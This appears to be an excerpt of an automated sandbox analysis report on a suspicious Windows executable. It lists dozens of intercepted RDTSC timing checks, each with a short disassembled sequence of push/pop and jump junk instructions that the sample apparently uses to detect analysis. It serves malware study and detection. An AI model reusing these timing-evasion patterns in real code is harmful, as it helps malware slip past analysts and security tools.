                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E80BC4 second address: E80BCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E80BCA second address: E80BFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F112ED79Dh 0x00000007 js 00007F9F112ED796h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 jo 00007F9F112ED7C4h 0x00000016 jmp 00007F9F112ED79Fh 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E80BFB second address: E80BFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E81BD7 second address: E81BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E81E71 second address: E81E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F9F10525C02h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E81E8C second address: E81E96 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E85079 second address: E850AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525BFBh 0x00000007 jmp 00007F9F10525C07h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jo 00007F9F10525C1Ch 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E850AA second address: E850B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F9F112ED796h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E8496D second address: E84979 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007F9F10525BF6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E84AF8 second address: E84AFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E84DC0 second address: E84DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pop ecx 0x00000009 push ebx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E84DCE second address: E84DDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F9F112ED796h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E87504 second address: E8753E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9F10525BFAh 0x00000008 jmp 00007F9F10525C04h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F9F10525C06h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E8753E second address: E87544 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E87544 second address: E8754E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F9F10525BF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E870A1 second address: E870A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E870A7 second address: E870B1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9F10525BF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E870B1 second address: E870B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E870B7 second address: E870CB instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9F10525BF8h 0x00000008 pushad 0x00000009 popad 0x0000000a jnp 00007F9F10525BFEh 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E870CB second address: E870E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9F112ED7A1h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E8D665 second address: E8D66C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E8CBB3 second address: E8CBBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E8CBBC second address: E8CBD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525C02h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E8CBD6 second address: E8CBDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E8CF08 second address: E8CF0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E8D042 second address: E8D046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E8D046 second address: E8D051 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E8D1CC second address: E8D1E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F9F112ED7A8h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E8D1E9 second address: E8D1F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E9143F second address: E91445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E91445 second address: E9146F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9F10525BF6h 0x00000008 jg 00007F9F10525BF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push edi 0x00000012 pop edi 0x00000013 jnc 00007F9F10525BF6h 0x00000019 jmp 00007F9F10525BFFh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E91132 second address: E91157 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jne 00007F9F112ED796h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F9F112ED7A4h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E91157 second address: E91162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F9F10525BF6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E91162 second address: E91184 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9F112ED7ACh 0x00000008 jmp 00007F9F112ED7A6h 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E9574D second address: E95756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E95756 second address: E9577B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9F112ED7B0h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E958D7 second address: E958E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E95A13 second address: E95A18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E95A18 second address: E95A24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jng 00007F9F10525BF6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E95E62 second address: E95E6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F9F112ED798h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E3A7A4 second address: E3A7AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E9F07E second address: E9F082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E9F082 second address: E9F086 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E9F086 second address: E9F08E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E9F08E second address: E9F0C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525C05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9F10525C09h 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E9F0C5 second address: E9F0DB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9F112ED796h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jng 00007F9F112ED796h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E9D241 second address: E9D256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 jmp 00007F9F10525BFCh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E9D256 second address: E9D280 instructions: 0x00000000 rdtsc 0x00000002 je 00007F9F112ED7ADh 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jnp 00007F9F112ED796h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E9D64A second address: E9D650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E9DCB0 second address: E9DCC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F112ED7A5h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E9E744 second address: E9E76E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pushad 0x00000007 jnc 00007F9F10525C10h 0x0000000d jmp 00007F9F10525C04h 0x00000012 jg 00007F9F10525BF6h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E9E76E second address: E9E774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E9E774 second address: E9E7B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F9F10525BF6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F9F10525C09h 0x00000013 jmp 00007F9F10525C05h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EA2F49 second address: EA2F60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F112ED7A3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EA2F60 second address: EA2F6B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EA2271 second address: EA227A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EA227A second address: EA229F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9F10525C02h 0x00000008 push eax 0x00000009 jmp 00007F9F10525BFEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EA268B second address: EA2692 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EA2AB5 second address: EA2ADD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9F10525BFEh 0x00000008 jmp 00007F9F10525BFEh 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EA2ADD second address: EA2AE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EA2AE1 second address: EA2AF4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9F10525BF6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EA2AF4 second address: EA2AF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EA2AF8 second address: EA2AFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EA2C62 second address: EA2C8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F9F112ED7A3h 0x0000000b jmp 00007F9F112ED7A2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EA2C8F second address: EA2CAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F9F10525C04h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EAF689 second address: EAF693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F9F112ED796h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EAF693 second address: EAF699 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EAF814 second address: EAF81E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9F112ED796h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EAF81E second address: EAF824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EAF824 second address: EAF83C instructions: 0x00000000 rdtsc 0x00000002 js 00007F9F112ED7A2h 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EAFB1E second address: EAFB45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525C09h 0x00000007 jng 00007F9F10525BF6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EAFB45 second address: EAFB4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F9F112ED796h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EAFB4F second address: EAFB6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525C09h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EAFB6C second address: EAFB9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F9F112ED79Ch 0x00000014 popad 0x00000015 jg 00007F9F112ED798h 0x0000001b jl 00007F9F112ED798h 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EAFD12 second address: EAFD16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EAFD16 second address: EAFD1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EAFD1A second address: EAFD22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EB0113 second address: EB0118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EB026B second address: EB0289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F9F10525C09h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EB7DBA second address: EB7DBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EB7DBE second address: EB7DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EB7DC4 second address: EB7DCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EB7DCD second address: EB7DFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F9F10525BF6h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F9F10525C02h 0x00000011 popad 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 pushad 0x00000016 popad 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c popad 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EB7DFC second address: EB7E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EB7E02 second address: EB7E06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EB7E06 second address: EB7E0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EC963D second address: EC9683 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F9F10525C07h 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F9F10525C04h 0x00000017 je 00007F9F10525BF6h 0x0000001d jne 00007F9F10525BF6h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EC97FB second address: EC9811 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F9F112ED79Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: ED1DB7 second address: ED1DBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: ED877D second address: ED8785 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: ED8785 second address: ED87A5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9F10525C08h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EDE9E0 second address: EDE9FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F9F112ED7A2h 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EDE9FE second address: EDEA0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F9F10525BF6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
